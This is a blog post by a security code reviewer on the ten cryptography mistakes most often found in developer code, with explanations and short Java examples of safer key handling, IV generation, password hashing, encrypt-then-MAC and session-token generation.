After doing hundreds of security code reviews for companies ranging from small start-ups to large banks and telcos, and after reading hundreds of stack overflow posts on security, I have composed a list of the top 10 crypto problems I have seen.

Bad crypto is everywhere, unfortunately. I find crypto done incorrectly far more often than I find it done correctly. Many of the problems are due to complex crypto APIs that are insecure by default and have poor documentation. Java is the biggest offender here, but it does not stand alone. Perhaps Java should learn from its archenemy, .Net, on how to build a crypto API that is easier to use and less prone to security problems.

Another reason for so many problems is that finding the issues seems to require manual code analysis by a trained expert. In my experience, the popular static analysis tools do not do well at finding crypto problems. Also, black-box penetration testing will almost never find these problems. My hope in publishing this list is that it will be used by both code reviewers and programmers to improve the state of crypto in software.

The list:

1. Hard-coded keys
2. Improperly choosing an IV
3. ECB mode of operation
4. Wrong use or misuse of a cryptographic primitive for password storage
5. MD5 just won’t die. And SHA1 needs to go too!
6. Passwords are not cryptographic keys
7. Assuming encryption provides message integrity
8. Asymmetric key sizes too small
9. Insecure randomness
10. “Crypto soup”

Now we break it down in detail:

1. Hard-coded keys

I have seen this very often. Hard-coding keys implies that whoever has access to the software knows the keys to decrypt the data (and for those developers who start talking about obfuscation, my 10th entry is for you). Ideally, we never want cryptographic keys accessible to human eyes (for example, see what happened to RSA about six years ago). But many companies fall far short of this ideal, and therefore the next best thing we can ask is to restrict access to the keys to a security operations team only. Developers should not have access to production keys, and especially those keys should not be checked into source code repositories.

Hard-coding keys is also indicative of insufficient thought about key management. Key management is a complex topic that goes well beyond the scope of this blog. But what I will say is that if a key gets compromised, then rotating a hard-coded key requires releasing new software that must be tested before going live. Releasing new software takes time, which is a luxury you do not have when incidents like this happen.

It’s easy for security people to tell developers what not to do, but the unfortunate reality is that what we really want them to do is often not feasible for whatever reason. Therefore, developers need some middle-ground advice.

A big caveat here is that I am neither a security operations person nor an expert on key management, but I can comment on what I have seen from a distance in some places. Even though it is less than ideal, a configuration file is a better option for key storage than hard-coding. Although some frameworks support encrypted configuration sections (see also this .Net guidance), what is really needed is for developers to have test keys for their test and development environments, with those keys replaced by real keys by a security operations team upon deployment into the live environment.

I have seen the above guidance botched in practice. In one case, the deployment team put in an RSA public key incorrectly and was not able to decrypt because they didn’t have a private key corresponding to the erroneous public key. My advice is that the software needs a means to test itself to make sure it can encrypt/decrypt (or whatever operation it needs to do), or else there needs to be a procedure as part of the deployment to make sure things work as expected.
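To make this concrete, here is a minimal Java sketch of pulling the key from the environment rather than the source code, plus the kind of encrypt/decrypt self-test described above. The environment variable name, class name, and key lengths are my own made-up choices; adapt them to your deployment process.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class KeyLoader {

    // Hypothetical environment variable name; real deployments will differ.
    private static final String KEY_ENV_VAR = "APP_AES_KEY";

    // Load a Base64-encoded AES key from the environment instead of the source code.
    public static SecretKey loadKey() {
        String encoded = System.getenv(KEY_ENV_VAR);
        if (encoded == null) {
            throw new IllegalStateException("No key configured in " + KEY_ENV_VAR);
        }
        byte[] keyBytes = Base64.getDecoder().decode(encoded);
        if (keyBytes.length != 16 && keyBytes.length != 32) {
            throw new IllegalStateException("Unexpected AES key length: " + keyBytes.length);
        }
        return new SecretKeySpec(keyBytes, "AES");
    }

    // Deployment self-test: confirm the configured key can round-trip a message.
    public static void selfTest(SecretKey key) throws Exception {
        byte[] iv = new byte[16];
        new SecureRandom().nextBytes(iv);
        byte[] message = "self-test".getBytes(StandardCharsets.UTF_8);

        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new IvParameterSpec(iv));
        byte[] ciphertext = cipher.doFinal(message);

        cipher.init(Cipher.DECRYPT_MODE, key, new IvParameterSpec(iv));
        if (!Arrays.equals(message, cipher.doFinal(ciphertext))) {
            throw new IllegalStateException("Encrypt/decrypt self-test failed");
        }
    }
}
```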

2. Improperly choosing an IV

IV means initialization vector. This problem usually occurs with the CBC mode of encryption. Very often it is a hard-coded IV, usually all 0s. In other cases, some magic is done with a secret (sometimes the key itself) and/or a salt, but the end result is that the same IV is used every time. The worst one I have seen, on three occasions, is the key also being used as the IV: see Section 7.6 of Crypto 101 on why this is dangerous.

When you are using CBC mode of operation, the requirement is that the IV is chosen randomly and unpredictably.  In Java, use SecureRandom.  In .Net, simply use GenerateIV.  Also, you cannot just choose an IV this way once and then use the exact same IV again for another encryption.  For every encryption, a new IV needs to be generated. The IV is not secret and is typically included with the encrypted data at the beginning.
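For the Java case, here is a minimal sketch of what “a new random IV for every encryption” looks like in practice. The class and method names are mine; the IV is prepended to the ciphertext so the decryptor can recover it.

```java
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;

public class CbcEncryptor {

    private static final SecureRandom RNG = new SecureRandom();

    // Encrypt with a freshly generated random IV and prepend the IV to the ciphertext.
    public static byte[] encrypt(SecretKey key, byte[] plaintext) throws Exception {
        byte[] iv = new byte[16];   // AES block size
        RNG.nextBytes(iv);          // new, unpredictable IV for every single encryption

        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new IvParameterSpec(iv));
        byte[] ciphertext = cipher.doFinal(plaintext);

        // The IV is not secret: store it with the encrypted data at the beginning.
        byte[] out = new byte[iv.length + ciphertext.length];
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ciphertext, 0, out, iv.length, ciphertext.length);
        return out;
    }
}
```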

If you do not choose your IV properly, then security properties are lost. An example of improper choice of IV where the implications were huge is in SSL/TLS.

Unfortunately, APIs are often the problem here. Apple’s API is a perfect example of what not to do (note: I am using this mirror of Apple’s code so I can link directly to the evidence): it tells developers the IV is optional and uses all zeros if it is not provided. Sure, it will still encrypt and decrypt, but it is not secure, Apple!

More information about requirements for IVs and nonces in various modes of operation is given here.

3. ECB mode of operation

When you encrypt with a block cipher such as the AES, you should choose a mode of operation.  The worst one you can choose or have chosen for you is ECB mode, which stands for Electronic Code Book.

It doesn’t matter what block cipher is under the hood: if you are using ECB mode, it is not secure because it leaks information about the plaintext. In particular, duplicate plaintexts become duplicate ciphertexts. If you think that doesn’t matter so much, then you probably have not seen the encrypted penguin yet either (this image is Copyright Larry Ewing, lewing@isc.tamu.edu, and I am required to mention The GIMP):

ECB_Penguin

Bad APIs, like Java, leave it up to the provider to specify the default behaviour. Typically, ECB is used by default. Embarrassingly, OWASP gets this wrong in their “Good Practice: Use Strong Algorithms” example, though they get it right here, which is one of the few places on the internet that looks to be free of problems.
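To illustrate in Java (a minimal sketch, not a complete encryption routine): asking for “AES” alone leaves the mode to the provider, which typically means ECB, while spelling out the full transformation avoids the surprise.

```java
import java.security.GeneralSecurityException;
import javax.crypto.Cipher;

public class ModeChoice {
    public static void main(String[] args) throws GeneralSecurityException {
        // Relying on the provider default can silently give you ECB:
        Cipher implicit = Cipher.getInstance("AES"); // typically resolves to AES/ECB/PKCS5Padding

        // Spell out the mode and padding so there is no ambiguity:
        Cipher explicit = Cipher.getInstance("AES/CBC/PKCS5Padding"); // still needs a fresh random IV per message

        System.out.println(implicit.getAlgorithm() + " vs " + explicit.getAlgorithm());
    }
}
```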

Bottom line: Don’t use ECB mode.  See here for guidance on modes that are safe to use.

4. Wrong use or misuse of a cryptographic primitive for password storage

When a crypto person sees PBKDF2 being used with 1000 iterations for password storage, they may complain that 1000 iterations is too few and a function like bcrypt is a better choice anyway. On the other hand, I have seen so much worse that I’m just excited that the developer is on the right track.

Part of the problem here is terminology, which the cryptographic community has made no effort to fix. Hash functions are wonderful, magical functions. They are collision resistant, preimage resistant, 2nd preimage resistant, behave like random oracles, and they are both fast and slow at the same time. Maybe, just maybe, it is time to define separate cryptographic functions for separate purposes rather than relying too much upon a single source of magic.

For password processing, the main properties we need are slow speed, preimage resistance, and 2nd preimage resistance. The slow speed requirement is explained wonderfully by Troy Hunt.

There are specific functions designed to meet these goals: pbkdf2, bcrypt, scrypt and argon2. Thomas Pornin has played an excellent role in helping developers and security engineers understand this. Now if only we can get rid of the MD5, SHA1, SHA256, and SHA512 implementations for processing passwords!

Also, I sometimes see APIs that make available PBKDF1, which really should not be used any more. Examples include Microsoft and Java.

Additionally, another common problem I see is hard-coded salts when doing password processing. One of the main purposes of the salt is so that two identical passwords do not “hash” to the same value. If you hard-code the salt, then you lose this property. In this case, one who gets access to your database can readily identify the easy targets by doing a frequency analysis on the ‘hashed’ passwords. The attacker’s efforts suddenly become more focused and more successful.

For developers, my recommendation is to do what Thomas Pornin says. He has commented on various aspects of password processing frequently on the security stack exchange.

Personally, I would go with bcrypt if that is possible. Unfortunately, many libraries only give you PBKDF2. If you are stuck with that, then make sure you use at least 10,000 iterations and be happy that your password storage is better than most.
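For those stuck with PBKDF2, here is a minimal Java sketch of doing it reasonably: a per-user random salt and at least 10,000 iterations. The class name and parameter choices are mine, and it assumes Java 8 or later for PBKDF2WithHmacSHA256.

```java
import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class PasswordHasher {

    private static final int ITERATIONS = 10_000; // the minimum suggested above; more is better
    private static final int SALT_BYTES = 16;
    private static final int HASH_BITS  = 256;

    // Returns { salt, hash }; both must be stored in order to verify the password later.
    public static byte[][] hash(char[] password) throws Exception {
        byte[] salt = new byte[SALT_BYTES];
        new SecureRandom().nextBytes(salt);   // per-user random salt, never hard-coded

        PBEKeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, HASH_BITS);
        byte[] hash = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                                      .generateSecret(spec)
                                      .getEncoded();
        spec.clearPassword();                  // wipe the password from the spec when done
        return new byte[][] { salt, hash };
    }
}
```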

5. MD5 just won’t die. And SHA1 needs to go too!

MD5 has been broken in practice for more than 10 years, and there were warnings against using it for more than 20 years.  Yet I am still finding MD5 in many, many places. Often, it is being used in some crazy way where it is not clear what the security properties are that they need.

SHA1 has been broken in theory almost as long as MD5, but the first real attack only came recently. Google did well in deprecating it from certificates years before the practical break; however, SHA1 still exists in developer code in many places.

Whenever I see developer code using a cryptographic hash function, I get worried. Often they do not know what they are doing. Hash functions are wonderful primitives for cryptographers to use in building useful cryptographic primitives such as message authentication codes, digital signature algorithms, and various prngs, but letting developers do what they please with them is like giving a machine gun to an 8 year old. Developers, are you sure these functions are what you need?

6. Passwords are not cryptographic keys

I see this often: not understanding the difference between a password and a cryptographic key. Passwords are things people remember and can be of arbitrary length. Keys, on the other hand, are not limited to printable characters and have a fixed length.

The security issue here is that keys should be full entropy, whereas passwords are low entropy by nature.  Sometimes you need to change a password into a key.  The proper way to do this is with a password based key derivation function (pbkdf2, bcrypt, scrypt or argon2), which compensates for the low entropy input by making the derivation of the key from the password a time consuming process.  Very seldom do I see this done.

Libraries like Crypto-js blend the concepts of keys and passwords together, and inevitably people who use it wonder why they cannot encrypt in JavaScript and then decrypt in Java or .Net or whatever other language/framework. Worse, the library uses some awful algorithm based upon MD5 to convert the password to a key.

My advice to developers is whenever you find an API that offers passwords or passphrases to encrypt, avoid it unless you specifically know how the password is converted to a key. Hopefully, the conversion is done with an algorithm such as PBKDF2, bcrypt, scrypt, or argon2.

For APIs that take keys as input, generate the keys using a cryptographic prng such as SecureRandom.
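As a sketch of the two cases in Java (names are mine): a full-entropy key generated by a cryptographic PRNG for APIs that take keys, and a PBKDF2 derivation for the rare cases where you truly must start from a password.

```java
import java.security.SecureRandom;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

public class Keys {

    // For APIs that take a key: generate a full-entropy key with a cryptographic PRNG.
    public static SecretKey randomAesKey() throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128, new SecureRandom());
        return kg.generateKey();
    }

    // If you must start from a password: derive the key with PBKDF2,
    // never feed the password bytes directly into the cipher.
    public static SecretKey keyFromPassword(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 10_000, 128);
        byte[] keyBytes = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                                          .generateSecret(spec)
                                          .getEncoded();
        return new SecretKeySpec(keyBytes, "AES");
    }
}
```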

7. Assuming encryption provides message integrity

Encryption hides data, but an attacker might be able to modify the encrypted data, and the results can potentially be accepted by your software if you do not check message integrity. While the developer will say “but the modified data will come back as garbage after decryption”, a good security engineer will find the probability that the garbage causes adverse behaviour in the software, and then he will turn that analysis into a real attack. I have seen many cases where encryption was used but message integrity was really needed more than the encryption. Understand what you need.

There are certain encryption modes of operation that provide both secrecy and message integrity, the best known one being GCM. But GCM is unforgiving if a developer reuses an IV. Given how frequent the IV reuse problem is, I cannot recommend GCM mode. Alternative options are .Net’s Counter with CBC-MAC and Java BouncyCastle’s CCMBlockCipher, EAXBlockCipher, and OCBBlockCipher.

For message integrity only, HMAC is an excellent choice. HMAC uses a hash function internally, and the specific one is not too important. I recommend that people use a hash function such as SHA256 under the hood, but the truth is that even HMAC-SHA1 is quite secure even though SHA1 lacks collision resistance.

Note that encryption and HMAC can be combined for both secrecy and message integrity. But the catch here is that the HMAC should not be applied to the plaintext but instead to the ciphertext combined with the IV.  Acknowledgments to the good people at /r/crypto for correcting earlier versions of this section.
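A minimal Java sketch of that combination (class and method names are mine, and it assumes a MAC key separate from the encryption key): the HMAC is computed over the IV plus the ciphertext, and verified with a constant-time comparison before any decryption happens.

```java
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.SecretKey;

public class EncryptThenMac {

    // Compute HMAC-SHA256 over IV || ciphertext (not over the plaintext).
    public static byte[] tag(SecretKey macKey, byte[] iv, byte[] ciphertext) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(macKey);
        mac.update(iv);
        mac.update(ciphertext);
        return mac.doFinal();
    }

    // Verify the tag before decrypting anything; use a constant-time comparison.
    public static boolean verify(SecretKey macKey, byte[] iv, byte[] ciphertext, byte[] expectedTag) throws Exception {
        byte[] actual = tag(macKey, iv, ciphertext);
        return MessageDigest.isEqual(actual, expectedTag);
    }
}
```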

8. Asymmetric key sizes too small

Developers do really well in choosing their symmetric key sizes, often choosing much stronger than they need (128-bit is enough). But for asymmetric crypto, they often err on the other side.

For RSA, DSA, DH, and similar algorithms, 1024-bit keys are within reaching distance of an organisation such as the NSA, and will soon become reachable by smaller organisations thanks to Moore’s law. At the very least, use 2048 bits.
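In Java this is a one-line fix when generating keys; a minimal sketch (class name mine):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;

public class RsaKeys {
    public static KeyPair generate() throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);   // 2048 bits at the very least; 1024 is no longer acceptable
        return kpg.generateKeyPair();
    }
}
```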

For elliptic curve based systems, one can get away with much smaller key sizes. I have not seen these algorithms used by developers so often, so I have not seen problems with key sizes for them.

General guidance on key sizes is provided here.

9. Insecure randomness

I’m surprised that this does not occur more often, but I do find it from time to time. The general issue is that typical (pseudo) random number generators may look random to the untrained eye, but to the trained expert they fail to meet the unpredictability requirement.

As an example, imagine you are using java.util.Random to generate a session token for a web application. When I as a legitimate user get my session token, I (using my crypto expertise) can then predict the next session token for the next user and the previous session token for the previous user. I can then hijack their sessions.

This would not be possible if the session token is generated with SecureRandom. The general requirement is a pseudo random number generator with cryptographic security. In .Net, the good source is System.Security.Cryptography.RandomNumberGenerator.

It is also worth mentioning that just because you are using a good source of randomness does not mean that you cannot screw up. For example, I saw one implementation that took a 32-bit integer from SecureRandom and hashed it to produce a session token. It never occurred to the developer that that implies at most 2^32 possible sessions, which would allow an attacker to hijack one just by enumerating these values.
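A minimal sketch of a safer session token in Java (names are mine): draw enough random bytes from SecureRandom that enumeration is hopeless, and encode them directly rather than hashing a small integer.

```java
import java.security.SecureRandom;
import java.util.Base64;

public class SessionTokens {

    private static final SecureRandom RNG = new SecureRandom();

    // 16 random bytes gives 128 bits of entropy, far beyond what an attacker can enumerate;
    // hashing a 32-bit value, even one from SecureRandom, leaves only 2^32 possible tokens.
    public static String newToken() {
        byte[] bytes = new byte[16];
        RNG.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}
```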

10. “Crypto soup”

I use this term for a developer mixing a bunch of cryptographic primitives together without a clear goal. I don’t like to call it roll-your-own-crypto, because I think of that term as describing an attempt to build something where the goals are clear, such as a block cipher.

Crypto soup often uses hash functions, and at this point you may want to have a second look at my final paragraph for point 5. When I see this, I want to scream to the developer “get your hands off that hash function, you don’t know what you’re doing!”

I remember one case of crypto soup where the developer used a hard-coded key. I told him that it was unclear what he was trying to do, but that he could not use hard-coded keys. This caused him a lot of trouble because there was no clear path forward for getting the key out of the source. Eventually, he explained that he didn’t really need security for what he was doing; he was just trying to obfuscate. Huh? This is exactly the type of conversation you tend to get into when you see crypto soup.

Concluding remarks

To improve the state of crypto in developer code, I make the following recommendations:

  • We need more educators!  I’m talking about people who understand crypto and also developer code.  I am pleased to find some very good people on Stack Overflow, but it is still the case that there is a lot of bad guidance all over the internet.  More good people need to help correct this.
  • Crypto APIs need to get better.  Using cryptographic functionality correctly needs to be easy.  It needs to be secure by default.  And the documentation needs to be very clear about what is happening.  Microsoft is going in the right direction, Java is not.
  • Static analysis tools need to improve.  Some of the issues above the tools will not be able to find, but others they should.  I am aware of one called Cryptosense, but unfortunately I have not had the chance to try it.  I have played a lot with big-name tools and have been disappointed by their lack of findings.
  • Code reviewers need to manually search for crypto problems.  It really is not that hard.  Start by doing a grep -Rli crypt (see how to do the equivalent in PowerShell) to get a list of files that contain the word “crypt”.  Also search for MD5 and so on.
  • Crypto researchers need to be more attached to real-world security problems.  If people like Dan Boneh and his colleagues can do research like this, then others can as well.  We need a lot more help to clean up the world’s crypto mess.